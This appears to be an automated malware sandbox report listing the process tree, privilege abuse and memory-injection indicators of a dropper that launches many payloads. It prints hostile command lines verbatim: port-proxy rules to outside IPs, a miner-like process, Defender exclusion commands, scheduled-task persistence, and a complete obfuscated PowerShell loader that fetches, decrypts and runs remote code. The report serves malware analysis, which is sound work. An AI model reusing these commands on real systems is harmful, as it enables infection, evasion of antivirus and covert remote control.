3304	powershell.exe
3304	powershell.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe
3900	gookcom.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

livecall.execmd.exe

pid process

4904 livecall.exe
1972 cmd.exe
1972 cmd.exe

pid	process
4904	livecall.exe
1972	cmd.exe
1972	cmd.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

Processes:

FUCKER.exe$77_loader.exeyoffens_crypted_EASY.exemsiexec.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXEQmpjm.exe$77_oracle.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXEMSBuild.exe$77_oracle.exefirst.exepowershell.exeghjkl.exegookcom.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4104	FUCKER.exe
Token: SeDebugPrivilege	2584	$77_loader.exe
Token: SeDebugPrivilege	3204	yoffens_crypted_EASY.exe
Token: SeBackupPrivilege	3204	yoffens_crypted_EASY.exe
Token: SeSecurityPrivilege	3204	yoffens_crypted_EASY.exe
Token: SeSecurityPrivilege	3204	yoffens_crypted_EASY.exe
Token: SeSecurityPrivilege	3204	yoffens_crypted_EASY.exe
Token: SeSecurityPrivilege	3204	yoffens_crypted_EASY.exe
Token: SeSecurityPrivilege	1664	msiexec.exe
Token: SeDebugPrivilege	704	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	4804	NETSTAT.EXE
Token: SeDebugPrivilege	3916	NETSTAT.EXE
Token: SeDebugPrivilege	2216	NETSTAT.EXE
Token: SeDebugPrivilege	3316	Qmpjm.exe
Token: SeLockMemoryPrivilege	2120	$77_oracle.exe
Token: SeLockMemoryPrivilege	2120	$77_oracle.exe
Token: SeDebugPrivilege	1264	NETSTAT.EXE
Token: SeDebugPrivilege	2632	NETSTAT.EXE
Token: SeDebugPrivilege	3472	NETSTAT.EXE
Token: SeDebugPrivilege	244	MSBuild.exe
Token: SeLockMemoryPrivilege	668	$77_oracle.exe
Token: SeLockMemoryPrivilege	668	$77_oracle.exe
Token: SeDebugPrivilege	416	first.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeDebugPrivilege	2276	ghjkl.exe
Token: SeDebugPrivilege	3900	gookcom.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe

Suspicious use of FindShellTrayWindow 11 IoCs

Processes:

Assistenza%20Launcher.exeu3hg.1.exe$77_oracle.exe$77_oracle.exe

pid	process
2444	Assistenza%20Launcher.exe
2444	Assistenza%20Launcher.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
2120	$77_oracle.exe
668	$77_oracle.exe

Suspicious use of SendNotifyMessage 9 IoCs

Processes:

Assistenza%20Launcher.exeu3hg.1.exe

pid	process
2444	Assistenza%20Launcher.exe
2444	Assistenza%20Launcher.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe
4968	u3hg.1.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

installer.exe

pid process

4992 installer.exe

pid	process
4992	installer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

FUCKER.exe$77_loader.execsc.exeISetup2.exeu3hg.0.execmd.exeCAKKKFBFID.execmd.exeu3hg.1.exepoolsdnkjfdbndklsnfgb.exelivecall.exelivecall.exe

description	pid	process	target process
PID 4104 wrote to memory of 2584	4104	FUCKER.exe	$77_loader.exe
PID 4104 wrote to memory of 2584	4104	FUCKER.exe	$77_loader.exe
PID 4104 wrote to memory of 3204	4104	FUCKER.exe	yoffens_crypted_EASY.exe
PID 4104 wrote to memory of 3204	4104	FUCKER.exe	yoffens_crypted_EASY.exe
PID 4104 wrote to memory of 3204	4104	FUCKER.exe	yoffens_crypted_EASY.exe
PID 4104 wrote to memory of 4516	4104	FUCKER.exe	ISetup2.exe
PID 4104 wrote to memory of 4516	4104	FUCKER.exe	ISetup2.exe
PID 4104 wrote to memory of 4516	4104	FUCKER.exe	ISetup2.exe
PID 2584 wrote to memory of 5092	2584	$77_loader.exe	csc.exe
PID 2584 wrote to memory of 5092	2584	$77_loader.exe	csc.exe
PID 5092 wrote to memory of 1636	5092	csc.exe	cvtres.exe
PID 5092 wrote to memory of 1636	5092	csc.exe	cvtres.exe
PID 2584 wrote to memory of 4952	2584	$77_loader.exe	chcp.com
PID 2584 wrote to memory of 4952	2584	$77_loader.exe	chcp.com
PID 4104 wrote to memory of 2444	4104	FUCKER.exe	cmd.exe
PID 4104 wrote to memory of 2444	4104	FUCKER.exe	cmd.exe
PID 4516 wrote to memory of 1560	4516	ISetup2.exe	u3hg.0.exe
PID 4516 wrote to memory of 1560	4516	ISetup2.exe	u3hg.0.exe
PID 4516 wrote to memory of 1560	4516	ISetup2.exe	u3hg.0.exe
PID 4104 wrote to memory of 1572	4104	FUCKER.exe	sys.exe
PID 4104 wrote to memory of 1572	4104	FUCKER.exe	sys.exe
PID 4104 wrote to memory of 1572	4104	FUCKER.exe	sys.exe
PID 4516 wrote to memory of 4968	4516	ISetup2.exe	u3hg.1.exe
PID 4516 wrote to memory of 4968	4516	ISetup2.exe	u3hg.1.exe
PID 4516 wrote to memory of 4968	4516	ISetup2.exe	u3hg.1.exe
PID 1560 wrote to memory of 2444	1560	u3hg.0.exe	cmd.exe
PID 1560 wrote to memory of 2444	1560	u3hg.0.exe	cmd.exe
PID 1560 wrote to memory of 2444	1560	u3hg.0.exe	cmd.exe
PID 2444 wrote to memory of 4972	2444	cmd.exe	CAKKKFBFID.exe
PID 2444 wrote to memory of 4972	2444	cmd.exe	CAKKKFBFID.exe
PID 2444 wrote to memory of 4972	2444	cmd.exe	CAKKKFBFID.exe
PID 4972 wrote to memory of 2396	4972	CAKKKFBFID.exe	cmd.exe
PID 4972 wrote to memory of 2396	4972	CAKKKFBFID.exe	cmd.exe
PID 4972 wrote to memory of 2396	4972	CAKKKFBFID.exe	cmd.exe
PID 2396 wrote to memory of 2248	2396	cmd.exe	PING.EXE
PID 2396 wrote to memory of 2248	2396	cmd.exe	PING.EXE
PID 2396 wrote to memory of 2248	2396	cmd.exe	PING.EXE
PID 4104 wrote to memory of 2220	4104	FUCKER.exe	poolsdnkjfdbndklsnfgb.exe
PID 4104 wrote to memory of 2220	4104	FUCKER.exe	poolsdnkjfdbndklsnfgb.exe
PID 4968 wrote to memory of 704	4968	u3hg.1.exe	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 4968 wrote to memory of 704	4968	u3hg.1.exe	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 4104 wrote to memory of 3316	4104	FUCKER.exe	Qmpjm.exe
PID 4104 wrote to memory of 3316	4104	FUCKER.exe	Qmpjm.exe
PID 2220 wrote to memory of 4764	2220	poolsdnkjfdbndklsnfgb.exe	livecall.exe
PID 2220 wrote to memory of 4764	2220	poolsdnkjfdbndklsnfgb.exe	livecall.exe
PID 2220 wrote to memory of 4764	2220	poolsdnkjfdbndklsnfgb.exe	livecall.exe
PID 4764 wrote to memory of 4904	4764	livecall.exe	livecall.exe
PID 4764 wrote to memory of 4904	4764	livecall.exe	livecall.exe
PID 4764 wrote to memory of 4904	4764	livecall.exe	livecall.exe
PID 4904 wrote to memory of 1972	4904	livecall.exe	cmd.exe
PID 4904 wrote to memory of 1972	4904	livecall.exe	cmd.exe
PID 4904 wrote to memory of 1972	4904	livecall.exe	cmd.exe
PID 4904 wrote to memory of 1972	4904	livecall.exe	cmd.exe
PID 2584 wrote to memory of 1160	2584	$77_loader.exe	netsh.exe
PID 2584 wrote to memory of 1160	2584	$77_loader.exe	netsh.exe
PID 2584 wrote to memory of 4804	2584	$77_loader.exe	NETSTAT.EXE
PID 2584 wrote to memory of 4804	2584	$77_loader.exe	NETSTAT.EXE
PID 2584 wrote to memory of 3916	2584	$77_loader.exe	NETSTAT.EXE
PID 2584 wrote to memory of 3916	2584	$77_loader.exe	NETSTAT.EXE
PID 2584 wrote to memory of 2216	2584	$77_loader.exe	NETSTAT.EXE
PID 2584 wrote to memory of 2216	2584	$77_loader.exe	NETSTAT.EXE
PID 2584 wrote to memory of 3128	2584	$77_loader.exe	netsh.exe
PID 2584 wrote to memory of 3128	2584	$77_loader.exe	netsh.exe
PID 2584 wrote to memory of 760	2584	$77_loader.exe	netsh.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104

C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
2⤵
- Sets file execution options in registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nmug4mwt.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:5092

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6284.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6283.tmp"
4⤵
PID:1636

C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
3⤵
PID:4952

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:1160

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
3⤵
PID:3128

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:760

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=5.133.65.53
3⤵
PID:492

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:5116

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:684

C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe" -o 5.133.65.54:80 --tls --http-port 888 -t 1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2120

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:3936

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:1084

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
3⤵
PID:4724

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:3340

C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe"
3⤵
- Executes dropped EXE
PID:4732

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4992

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
5⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4516

C:\Users\Admin\AppData\Local\Temp\u3hg.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3hg.0.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CAKKKFBFID.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2444

C:\Users\Admin\AppData\Local\Temp\CAKKKFBFID.exe
"C:\Users\Admin\AppData\Local\Temp\CAKKKFBFID.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CAKKKFBFID.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
7⤵
- Runs ping.exe
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 2488
4⤵
- Program crash
PID:1544

C:\Users\Admin\AppData\Local\Temp\u3hg.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3hg.1.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4968

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 996
3⤵
- Program crash
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 1420
3⤵
- Program crash
PID:4628

C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Launcher.exe"
2⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2444

C:\Users\Admin\AppData\Local\Temp\Files\sys.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sys.exe"
2⤵
- Executes dropped EXE
PID:1572

C:\Users\Admin\AppData\Local\Temp\Files\poolsdnkjfdbndklsnfgb.exe
"C:\Users\Admin\AppData\Local\Temp\Files\poolsdnkjfdbndklsnfgb.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2220

C:\Users\Admin\AppData\Local\Temp\Updatemonitor\livecall.exe
C:\Users\Admin\AppData\Local\Temp\Updatemonitor\livecall.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4764

C:\Users\Admin\AppData\Roaming\Updatemonitor\livecall.exe
"C:\Users\Admin\AppData\Roaming\Updatemonitor\livecall.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:244

C:\Users\Admin\AppData\Local\Temp\Files\Qmpjm.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Qmpjm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Users\Admin\AppData\Local\Temp\Files\mk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\mk.exe"
2⤵
- Executes dropped EXE
PID:3864

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"
2⤵
- Executes dropped EXE
PID:2020

C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3304

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:3652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"
3⤵
PID:4028

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
4⤵
- Creates scheduled task(s)
PID:4428

C:\Users\Admin\AppData\Local\Temp\Files\first.exe
"C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'
3⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
"C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
2⤵
- Executes dropped EXE
PID:3896

C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe
"C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"
2⤵
- Executes dropped EXE
PID:2912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File socks5-clean.ps1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
3⤵
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 1764
3⤵
- Program crash
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 1764
3⤵
- Program crash
PID:5992

C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
"C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"
2⤵
- Executes dropped EXE
PID:1444

C:\Windows\SysWOW64\cmd.exe
"cmd" /c net use
3⤵
PID:2528

C:\Windows\SysWOW64\net.exe
net use
4⤵
PID:2468

C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
"C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"
2⤵
- Executes dropped EXE
PID:1792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
3⤵
PID:1360

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
4⤵
- Creates scheduled task(s)
PID:2788

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
3⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\Files\Pac-Man.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Pac-Man.exe"
2⤵
PID:2632

C:\Users\Admin\AppData\Local\Temp\Files\cmon.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cmon.exe"
2⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\Files\BrawlB0t.exe
"C:\Users\Admin\AppData\Local\Temp\Files\BrawlB0t.exe"
2⤵
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\BrawlB0t.exe'
3⤵
PID:2680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'
3⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
2⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
"C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
3⤵
PID:2272

C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Updater.exe"
2⤵
PID:3332

C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe"
2⤵
PID:4996

C:\Users\Admin\AppData\Local\Temp\Files\ffffffffffbbbbb_crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ffffffffffbbbbb_crypted.exe"
2⤵
PID:2064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ffffffffffbbbbb_crypted.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
3⤵
PID:5716

